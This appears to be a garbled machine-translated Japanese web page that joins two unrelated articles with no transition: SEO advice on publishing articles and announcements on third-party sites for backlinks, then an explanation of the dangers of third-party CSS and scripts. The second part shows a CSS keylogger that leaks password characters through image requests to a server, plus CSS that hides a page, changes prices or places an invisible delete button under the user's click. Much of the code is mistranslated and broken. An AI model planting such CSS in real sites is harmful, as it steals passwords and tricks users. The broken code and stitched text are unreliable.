戸口。 WordPress。 ブログ内およびサードパーティのリソースへのリンク記事とその機能を投稿するためのオプション
PRの法則によれば、「あなたのことを知っている人が増えるほど、より多くの顧客がサービスを利用するようになります!」 同じ目標は、サードパーティのリソースに関する記事の公開にも定められています。 各サードパーティサイトは次のとおりです。
- 新しいオーディエンス、そしてその結果、潜在的な顧客。
- 訪問者の数を数回超えるトラフィックの流入。
- あなたのサイトへの自然なリンク。
- ソーシャルでの記事の配布の可能性(興味深い場合)。 ネットワーク。
バックリンク付きの無料公開サイトのリスト
特別なセクションがあるフォーラム(webmasters.ru、maultalk.com)
サードパーティのサイトを選択するときに探すべきこと
フィルタ。 無料配置の機会を提供するサイトは、ACSの下にある場合があります。 その中にあなたのサイトへのリンクを公開することによって、あなたはランキングを失うか、さらに悪いことに、ミヌシンスクに分類される危険があります。 役立つRDSバー。
チック。 最初のオプションと同様に、選択したサイトは「ミヌシンスク」の下にある可能性があります。さらに、TICが0のサイトからのリンクは「カスタム」に似ています。
記事とその機能を投稿するためのオプション
サードパーティのサイトに記事を投稿するには、次の2つの方法があります。
- フルコピー;
- 発表。
それぞれの方法の有効性について詳しく話しましょう。
ソースへのリンクを含む完全なコピーによってサードパーティのサイトに記事を配置する
情報を共有するためのかなり人気のある方法。 すぐ上に公開されているサイトのリストを使用すると、完全な記事を投稿できます。 ソースにリンクするための特別なフィールドもあります。 興味深い記事はすぐに人気を博し、議論され、高く評価されます。 すべてがうまくいくでしょうが、コインには別の側面があります。
- サードパーティのサイトに記事全体を投稿することで、リソースへのターゲットトラフィックの流れを遮断します。 結局のところ、サードパーティのリソースに関する記事を読むことができるのに、なぜどこかに行くのでしょうか。
- 支配のために戦う。 確かに、あなたがあなたの記事を投稿するリソースは、たとえインデックスが付けられていても、ランキング指標(トラフィック、ティッツ、信頼)の点であなたのサイトよりも進んでいます。 インターネット上では、重複するページが元のページよりもランクが高い場合が多くあります。
- 独自性。 役に立つ資料はあなたの助けがなくてもコピーされます。 記事全体を公開することで、テキストの一意性を低下させるページ数を増やすだけです。 その結果、プロモートされたクエリでページがたるむ可能性があります。
- 問題を更新します。 実際には、ページのURL(アドレス)を変更する過程で、コンテンツを完全に書き直さなければならないプロジェクトに出くわしました。 この理由は、ホストされた資料を使用するサードパーティのサイトです。
リソースへのリンクを含む記事の発表の配置
このオプションは、記事全体ではなく、写真付きの簡単な発表をサードパーティのサイトに公開するためのものです。 そして、1つの見出しはここで降りません。 結局のところ、私たちは私たちのリソースへの移行を得るのに十分な聴衆に興味を持っている必要があります。 主な問題は、それを可能な限り面白くすることです。 そして、最初の段落をコピーするだけでなく、それをユニークにします。
社会的 ネットワーク-アナウンスの最適なサイズは300文字です。 アナウンスは一度書けば、すべてのサイトで公開できます。
ポータルに関しては、1000文字の領域でより大きな発表があるはずです。 このようなポータルのオーディエンスは、最初に「有用性」を評価し、次に移行のみを行うことに慣れています。
ポータルといえば、出版物の要件を考慮する必要があります。 記事の独自性が必須である場合は、独自の発表を書いてください。 一意性が重要でない場合は、すでに作成されているものを公開します。
その結果、次のようになります。
- あなたの投稿に対するユーザーの関心。
- 交通流。
- リンクビルディング。
- コンテンツをユニークに保つ。
ちなみに、この発表は、インターネットに記事を散らかすだけでなく、興味深い資料を書くための優れたインセンティブとして役立ちます。
ソフトウェアチップ
ソーシャルでの発表の公開で作業を簡素化します。 OpenGraphマークアップを使用するネットワーク。 それはあなたが記事の発表を処方することを可能にします。 その結果、定期的な再投稿の際に、公開されたリンクのタイトル、お知らせ、写真が自動的に挿入されます。 開いているグラフマークアップの視覚的表示を確認できます
サードパーティのCSS、JavaScript、および他の人のサーバーからの他のリソースを使用して、サイトに損害を与える方法を説明します。
2月末に、CSSを部分的に使用するキーロガーがWebに登場しました。 助けを借りた攻撃は単純です。特定のタイプ(パスワードなど)のフィールドに入力された文字ごとに、サードパーティのサーバーにリクエストが生成され、おそらく背景画像をリクエストします。
input(background-image:url( "http:// localhost:3000 / a");)
背景画像:url( "http:// localhost:3000 / a"); |
サーバー上でクエリシーケンスを登録でき、入力したパスワードを簡単に計算できます。
問題を議論する過程で、ブラウザメーカーが修正に取り組むことを提案する人もいました。 誰かが問題がReactのようなフレームワーク上のサイトにのみ関連していることに気づき、責任をそれらに移しました。
サードパーティの写真
< img src = 「https://example.com/kitten.jpg」> |
この種の画像をサイトに追加すると、example.comに依存するようになります。 たとえば、画像を削除するなど、さまざまな方法で設定できます。画像の代わりに404が表示されます。 または、猫の画像を不快なものに置き換えることもできます。
画像がサードパーティのリソースから追加されたものであり、関連していないことをユーザーに警告できます。 これはあなたにいくつかのトラブルを救うでしょう。 ただし、もちろん、簡単な画像を追加する場合は、パスワードへのアクセスを許可しません。
サードパーティのスクリプト
|
この例は、example.comにとってはるかに興味深いものです。なぜなら、彼らのサイトからスクリプトを追加することで、彼らのサイトをより細かく制御できるからです。 この場合、example.comは次のようになります。
- ページコンテンツの読み取り/変更。
- すべてのユーザーアクションを追跡します。
- 計算が難しいコード(たとえば、cryptominer)を実行します。
- クッキーをリクエストします。
- ローカルストレージの読み取り/変更。
言い換えれば、example.comは多くのことを実行できるようになりました。
ローカルストレージとの相互作用は、将来さらに多くの問題をもたらします。 スクリプトがページから削除された後でも、サードパーティのリソースがサイトにアクセスできます。 サードパーティのスクリプトをサイトに追加する場合は、ソースとそのセキュリティを完全に信頼する必要があります。
それでも問題のあるスクリプトが発生する場合は、Clear-Site-Dataヘッダーを使用してみてください。
サードパーティのCSS
< link rel = "stylesheet" href = 「https://example.com/style.css」> |
サイトへの影響に関するサードパーティのCSSコードは、画像とスクリプトの間にあります。 エイリアンCSSは次のことができます。
- ページのコンテンツを削除/変更/追加します。
- ページの内容に基づいてリクエストを行います。
- 多くのユーザーアクションに応答します。
CSSはローカルストレージと対話できず、cryptominerはページに埋め込まれませんが、リソースの所有者に多くの害をもたらす可能性があります。
キーロガー
記事の最初からCSSを少し変更してみましょう。
input(background-image:url( "/ password?a");)
input [type = "password"] [value $ = "a"]( 背景画像:url( "/ password?a"); |
このコードは、入力された文字「a」に関するデータを、画像リクエストを装ってハンドラーに送信します。 文字ごとにコードを繰り返すと、CSSキーロガーがすでにあります。
デフォルトでは、ブラウザはユーザーが入力した文字をvalue属性に保存しないため、このトリックは、のように値を同期するものを使用する場合に機能します。
もちろん、この問題はReactや同様のフレームワークの側で解決できます。 しかし、その後は特定のケースのみが解決され、残りの問題は残ります。
消えるコンテンツ
body(display:none;)html :: after(content: "HTTP Server Error";)
体 ( 表示:なし; html :: after( コンテンツ:"HTTPサーバーエラー"; |
もちろん、これは非常に独特な例ですが、それでも機能する例です。 ユーザーがサイトにアクセスしたときに、通常のメインページではなく、理解できないエラーが表示された場合を想像してみてください。 同様に、サードパーティのコードは、たとえば「購入」ボタンを削除したり、その他の迷惑をかけたりする可能性があります。
コンテンツの追加
Price-value :: before(content: "1";)
価格-値::before( コンテンツ: "1"; |
そして、ちょうどそのように、あなたの価格は急騰しました。
コンテンツの移動
Delete-everything-button(不透明度:0;位置:絶対;上:500px;左:300px;)
すべて削除ボタン( 不透明度:0 位置:絶対; 上:500px; 左:300px |
ユーザーがクリックするだけではないひどいことをするボタンを取り、それを透明にして、ユーザーが必ずクリックする場所に置きます。
もちろん、ボタンが本当に重要なことをする場合、ユーザーは最初に警告ダイアログを見るでしょう。 しかし、それも問題ではありません。CSSがもっと必要なだけです。 たとえば、「ああ、なんてことだ!」ボタンの内容を「もちろん、きっと」に変更することができます。
ブラウザメーカーがキーロガーのトリックを修正したと想像してみてください。 攻撃者は、重要なパスワードフィールドの上に追加のテキストフィールドを配置するだけで、ビジネスに復帰します。
属性の読み取り
値やその他の属性は必ずしもパスワードを保存するわけではありません。攻撃者は他に興味のあるものを見つける可能性があります。